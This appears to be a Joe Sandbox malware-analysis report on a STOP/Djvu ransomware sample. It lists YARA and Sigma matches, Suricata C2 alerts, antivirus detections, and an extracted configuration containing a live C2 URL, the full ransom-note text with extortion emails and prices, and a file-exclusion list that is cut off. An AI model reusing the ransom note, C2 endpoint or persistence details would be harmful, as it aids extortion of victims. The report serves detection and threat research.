10.2.file.exe.22c15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.file.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
12.2.file.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.file.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.file.exe.21a15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.file.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.file.exe.21a15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
12.2.file.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.file.exe.21a15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
12.2.file.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.file.exe.21a15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.file.exe.21a15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.file.exe.21a15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.file.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.file.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
7.2.file.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.file.exe.22315a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.file.exe.22315a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.file.exe.22315a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.2.file.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.file.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.file.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
13.2.file.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.file.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
13.2.file.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.2.file.exe.21e15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.2.file.exe.21e15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.2.file.exe.21e15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.2.file.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.2.file.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
11.2.file.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.2.file.exe.21e15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.2.file.exe.21e15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.2.file.exe.21e15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
12.2.file.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
12.2.file.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
12.2.file.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
13.2.file.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.file.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
13.2.file.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
3.2.file.exe.22f15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
3.2.file.exe.22f15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3.2.file.exe.22f15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.file.exe.22c15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.file.exe.22c15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.file.exe.22c15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.2.file.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.2.file.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
11.2.file.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Click to see the 55 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6956, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-09T10:48:45.328301+0200
SID:	2803274
Severity:	2
Source Port:	49740
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Win32/Filecoder.STOP Variant Public Key Download - Source IP: 58.151.148.90 - Destination IP: 192.168.2.4

Timestamp:	2024-08-09T10:48:49.611466+0200
SID:	2036335
Severity:	1
Source Port:	80
Destination Port:	64820
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-09T10:48:09.976742+0200
SID:	2803274
Severity:	2
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE STOP Ransomware CnC Activity - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	2024-08-09T10:48:49.611254+0200
SID:	2833438
Severity:	1
Source Port:	64820
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-09T10:48:22.865818+0200
SID:	2803274
Severity:	2
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-09T10:48:40.324827+0200
SID:	2803274
Severity:	2
Source Port:	49739
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-09T10:48:32.952529+0200
SID:	2803274
Severity:	2
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cajgtus.com/test1/get.php	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Q	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Avira: detection malicious, Label: HEUR/AGEN.1318094

Found malware configuration

Source: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\del

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

ReversingLabs: Detection: 86%

Multi AV Scanner detection for submitted file

Source: file.exe	Virustotal: Detection: 80%			Perma Link
Source: file.exe	ReversingLabs: Detection: 100%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext,	1_2_00411178
